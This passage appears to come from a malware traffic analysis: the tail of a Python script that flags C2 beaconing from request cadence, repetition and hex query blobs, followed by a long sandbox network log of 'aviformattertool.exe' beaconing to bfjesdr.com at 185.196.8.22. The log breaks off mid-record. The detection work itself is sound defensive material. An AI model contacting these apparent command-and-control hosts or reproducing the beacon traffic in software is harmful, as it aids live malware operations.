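    """Score a set of (timestamp, request-line) pairs for C2 beaconing."""
    findings = ua_findings(ua)
    lines = {line for _, line in requests}
    if len(lines) == 1 and len(requests) >= 5:
        findings.append(f"identical request repeated {len(requests)} times")
    path = next(iter(lines)).split(" ")[1]
    q = parse_qs(urlparse(path).query).get("q", [""])[0]
    if re.fullmatch(r"[0-9a-f]{64,}", q):
        findings.append(f"{len(q) // 2}-byte opaque hex blob in q=")
    secs = sorted(ts_to_seconds(ts) for ts, _ in requests)
    gaps = [b - a for a, b in zip(secs, secs[1:])]
    mean = statistics.fmean(gaps) if gaps else 0.0
    cv = statistics.pstdev(gaps) / mean if mean else 0.0
    if gaps and cv < CADENCE_CV_MAX:
        findings.append(f"fixed cadence: mean gap {mean:.2f}s, CV {cv:.2f}")
    return {"query": q, "mean_gap": mean, "cv": cv,
            "findings": findings, "beacon": len(findings) >= 3}


if __name__ == "__main__":
    print("response body:", decode_chunked(RESPONSE_RAW))
    for finding in analyse(REQUESTS, USER_AGENT)["findings"]:
        print("-", finding)
```

Run stand-alone it prints the decoded body and the four findings for this capture. The cadence test uses the coefficient of variation of the inter-request gaps rather than a fixed interval, so it still fires on the alternating ~0.33 s / ~0.53 s pattern visible in the timestamps above; on real traffic, group requests by (process, destination, path) before scoring, otherwise a busy browser dilutes the signal.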


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49752 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe

Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:05.129722118 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:05.351854086 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:05 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Jan 13, 2024 06:33:05.463480949 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:05.681056023 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:05 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:33:05.793431997 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:06.010400057 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:05 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49753 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:06.324937105 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:06.546228886 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49754 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:06.855163097 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:07.072206020 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Jan 13, 2024 06:33:07.182902098 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:07.405956984 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49755 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:07.714122057 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:07.930588007 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Jan 13, 2024 06:33:08.041169882 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:08.262914896 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49756 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:08.572235107 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:08.788881063 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Jan 13, 2024 06:33:08.901734114 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:09.128509998 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49757 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:09.431405067 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:09.647475958 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Jan 13, 2024 06:33:09.764830112 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:09.981295109 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49758 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:10.293401003 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:10.514431953 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:10 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49759 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:10.824712038 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:11.041846991 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:10 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49760 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:11.360379934 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:11.581237078 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:11 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49761 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:11.887798071 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:12.116878986 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:12 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Jan 13, 2024 06:33:12.231085062 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:12.449938059 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:12 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49762 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:12.761931896 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:12.978080988 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:12 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Jan 13, 2024 06:33:13.090413094 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:13.320611000 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:13 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Jan 13, 2024 06:33:13.434138060 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:13.650706053 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:13 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 49763 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:13.971772909 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:14.193152905 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:14 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Jan 13, 2024 06:33:14.309309959 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:14.526736975 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:14 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 49764 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:14.846693039 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:15.062879086 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:14 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
27         | 192.168.2.4 | 49765       | 185.196.8.22   | 80               | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe

Timestamp                           | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:15.387190104 CET | 326               | OUT       | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                    |                   |           | Host: bfjesdr.com
                                    |                   |           | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:15.609944105 CET | 220               | IN        | HTTP/1.1 200 OK
                                    |                   |           | Server: nginx/1.20.1
                                    |                   |           | Date: Sat, 13 Jan 2024 05:33:15 GMT
                                    |                   |           | Content-Type: text/html; charset=UTF-8
                                    |                   |           | Transfer-Encoding: chunked
                                    |                   |           | Connection: keep-alive
                                    |                   |           | X-Powered-By: PHP/7.4.33
                                    |                   |           | Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                    |                   |           | Data Ascii: e67b680813008c20


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
28         | 192.168.2.4 | 49766       | 185.196.8.22   | 80               | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe

Timestamp                           | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:15.931714058 CET | 326               | OUT       | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                    |                   |           | Host: bfjesdr.com
                                    |                   |           | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:16.154150009 CET | 220               | IN        | HTTP/1.1 200 OK
                                    |                   |           | Server: nginx/1.20.1
                                    |                   |           | Date: Sat, 13 Jan 2024 05:33:16 GMT
                                    |                   |           | Content-Type: text/html; charset=UTF-8
                                    |                   |           | Transfer-Encoding: chunked
                                    |                   |           | Connection: keep-alive
                                    |                   |           | X-Powered-By: PHP/7.4.33
                                    |                   |           | Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                    |                   |           | Data Ascii: e67b680813008c20


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
29         | 192.168.2.4 | 49767       | 185.196.8.22   | 80               | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe

Timestamp                           | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:16.786056042 CET | 326               | OUT       | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                    |                   |           | Host: bfjesdr.com
                                    |                   |           | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:17.002783060 CET | 220               | IN        | HTTP/1.1 200 OK
                                    |                   |           | Server: nginx/1.20.1
                                    |                   |           | Date: Sat, 13 Jan 2024 05:33:16 GMT
